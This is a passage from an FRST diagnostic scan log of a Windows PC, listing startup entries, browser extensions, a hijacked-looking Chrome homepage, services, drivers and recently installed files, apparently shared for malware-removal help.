HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [2068856 2011-10-12] (Flexera Software LLC.)

HKLM-x32\...\Run: [Spellex] => C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe [53760 2015-02-12] ()

HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1065968 2015-07-23] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [2068856 2011-10-12] (Flexera Software LLC.)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1343854479-873069186-2863876452-1003\...\Run: [moveuser] => C:\Windows\iansyst\imoveuser.exe [293213 2013-07-30] ()

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

Tcpip\..\Interfaces\{139019A9-051D-4E9B-8DE0-B85849599CA1}: [DhcpNameServer] 192.168.5.253

Tcpip\..\Interfaces\{E290C363-028E-443D-B7BF-CFA28FF92AE5}: [DhcpNameServer] 192.168.0.1

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/?gws_rd=ssl

HKU\S-1-5-21-1343854479-873069186-2863876452-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk

HKU\S-1-5-21-1343854479-873069186-2863876452-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.co.uk

URLSearchHook: [S-1-5-21-1343854479-873069186-2863876452-1003] ATTENTION => Default URLSearchHook is missing

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 

BHO: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\dgnriaie_x64.dll [2014-07-12] (Nuance Communications, Inc.)

BHO: Easy Photo Print -> {9421DD08-935F-4701-A9CA-22DF90AC4EA6} -> C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)

BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-19] (Microsoft Corporation)

BHO-x32: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\dgnriaie.dll [2014-07-12] (Nuance Communications, Inc.)

BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)

Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)

Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)

Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

 

FireFox:

========

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)

FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)

FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)

FF Plugin: nuance.com/DgnRia2_x86_64 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\npDgnRia2_x64.dll [2014-07-12] (Nuance Communications, Inc.)

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)

FF Plugin-x32: nuance.com/DgnRia2 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\npDgnRia2.dll [2014-07-12] (Nuance Communications, Inc.)

FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on

FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2015-12-14] [not signed]

 

Chrome: 

=======

CHR HomePage: Default -> hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro

CHR StartupUrls: Default -> "hxxps://www.google.co.uk/","hxxp://www.uea.ac.uk/is/portal","hxxp://en-gb.facebook.com/"

CHR Profile: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Slides) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-14]

CHR Extension: (Google Docs) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-31]

CHR Extension: (Google Drive) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-31]

CHR Extension: (YouTube) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-31]

CHR Extension: (Google Search) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-31]

CHR Extension: (Google Sheets) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-14]

CHR Extension: (Google Docs Offline) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-31]

CHR Extension: (AdBlock) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-02-07]

CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2016-02-09]

CHR Extension: (Nebula) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlmflgnnmmojlnbmaokpfcjdkhkjbnok [2016-02-01]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-14]

CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2016-01-31]

CHR Extension: (Gmail) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-31]

 

==================== Services (Whitelisted) ========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2772720 2016-01-17] (Microsoft Corporation)

R2 DragonLoggerService; C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe [137280 2014-07-12] (Nuance Communications, Inc.)

R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)

R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)

R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [328296 2014-10-17] (Intel Corporation)

R2 MBAMScheduler; D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)

R2 MBAMService; D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)

R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [703984 2014-09-22] (SEIKO EPSON CORPORATION)

S3 Olympus DVR Service; C:\Program Files (x86)\Common Files\Olympus Shared\DeviceManager\olydvrsv.exe [174592 2012-11-08] (OLYMPUS IMAGING CORP.) [File not signed]

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [293080 2015-08-04] (Realtek Semiconductor)

S2 SpxDictService; C:\Program Files (x86)\Spellex\Spellex Dictation\SpxDictService.exe [17920 2015-02-12] () [File not signed]

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-04-11] (Synaptics Incorporated)

R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.) [File not signed]

R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-10-07] (Microsoft Corporation)

R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-10-07] (Microsoft Corporation)

 

===================== Drivers (Whitelisted) ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-09] (Malwarebytes)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)

R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [126976 2014-09-03] (Intel Corporation)

S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [508120 2014-08-15] (Realsil Semiconductor Corporation)

R3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [3556056 2014-10-28] (Realtek Semiconductor Corporation                           )

R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-04-11] (Synaptics Incorporated)

S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-10-07] (Microsoft Corporation)

R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-10-07] (Microsoft Corporation)

R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-10-07] (Microsoft Corporation)

R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-02-09 17:35 - 2016-02-09 17:35 - 00000000 ____D C:\Program Files (x86)\ESET

2016-02-09 16:44 - 2016-02-09 17:40 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2016-02-09 16:44 - 2016-02-09 16:44 - 00000674 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2016-02-09 16:44 - 2016-02-09 16:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2016-02-09 16:44 - 2016-02-09 16:44 - 00000000 ____D C:\ProgramData\Malwarebytes

2016-02-09 16:44 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys

2016-02-09 16:44 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2016-02-09 16:44 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys

2016-02-09 15:44 - 2016-02-09 15:48 - 00000000 ____D C:\AdwCleaner

2016-02-09 14:28 - 2016-02-09 14:28 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller

2016-02-09 11:48 - 2016-02-09 21:10 - 00000000 ____D C:\FRST

2016-01-31 19:25 - 2016-02-05 13:33 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk

2016-01-28 20:46 - 2016-01-28 20:46 - 00000000 ____D C:\Program Files\Common Files\DESIGNER

2016-01-22 18:57 - 2016-01-22 18:57 - 00000000 ____D C:\ProgramData\Unchecky

2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonocent Audio Notetaker

2016-01-19 12:50 - 2016-01-19 12:50 - 00000000 ____D C:\Program Files (x86)\Sonocent

2016-01-12 22:03 - 2015-12-10 00:40 - 00033456 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe

2016-01-12 22:03 - 2015-11-17 21:07 - 01380864 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00705024 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00505344 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll

2016-01-12 22:03 - 2015-11-17 21:07 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

2016-01-12 20:54 - 2015-12-11 04:38 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2016-01-12 20:54 - 2015-12-11 04:00 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2016-01-12 20:54 - 2015-12-11 03:55 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2016-01-12 20:54 - 2015-12-11 03:50 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll

2016-01-12 20:54 - 2015-12-11 03:45 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2016-01-12 20:54 - 2015-12-11 03:21 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll

2016-01-12 20:54 - 2015-12-11 03:18 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2016-01-12 20:54 - 2015-12-11 03:09 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll

2016-01-12 20:54 - 2015-12-11 03:09 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll

2016-01-12 20:54 - 2015-12-11 03:03 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2016-01-12 20:54 - 2015-12-11 02:59 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2016-01-12 20:54 - 2015-12-11 02:43 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll

2016-01-12 20:54 - 2015-12-11 02:43 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll

2016-01-12 20:54 - 2015-12-11 02:38 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2016-01-12 20:54 - 2015-12-11 02:37 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll

2016-01-12 20:54 - 2015-12-11 02:35 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll

2016-01-12 20:54 - 2015-12-11 02:26 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2016-01-12 20:54 - 2015-12-11 02:14 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll

2016-01-12 20:54 - 2015-12-11 02:12 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll

2016-01-12 20:54 - 2015-12-11 02:08 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll

2016-01-12 20:54 - 2015-12-11 02:07 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll

2016-01-12 20:53 - 2015-12-30 19:32 - 07453016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe

2016-01-12 20:53 - 2015-12-30 19:32 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll

2016-01-12 20:53 - 2015-12-30 19:32 - 01499912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll

2016-01-12 20:53 - 2015-12-07 10:56 - 01380600 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 02745184 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02528784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02450240 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02447136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 02334104 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 02324744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01877504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01798480 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01484888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01288128 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01210200 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 01150232 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 01115640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 01037680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00914672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00850680 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00735496 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00700360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00629600 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00584656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00557856 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00498472 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00492736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00463776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00399776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00299080 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00275312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00274280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00248432 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00246856 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00244296 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00229272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00203016 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00184912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00183856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00116720 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00110544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00099136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL

2016-01-12 20:53 - 2015-12-05 05:58 - 00090904 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00090392 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00081032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll

2016-01-12 20:53 - 2015-12-05 05:58 - 00076936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll

2016-01-12 20:53 - 2015-12-04 15:00 - 01097216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00561952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys

2016-01-12 20:53 - 2015-12-03 19:42 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00137968 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll

2016-01-12 20:53 - 2015-12-03 19:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll

2016-01-12 20:53 - 2015-12-03 19:41 - 00177488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys

2016-01-12 20:53 - 2015-12-03 18:52 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll

2016-01-12 20:53 - 2015-12-03 18:52 - 00120376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll

2016-01-12 20:53 - 2015-12-03 18:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll

2016-01-12 20:53 - 2015-12-03 18:28 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys

2016-01-12 20:53 - 2015-12-03 18:28 - 00202240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys

2016-01-12 20:53 - 2015-12-03 18:07 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

2016-01-12 20:53 - 2015-12-03 18:07 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax

2016-01-12 20:53 - 2015-12-03 18:05 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL

2016-01-12 20:53 - 2015-12-03 18:02 - 01664000 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL

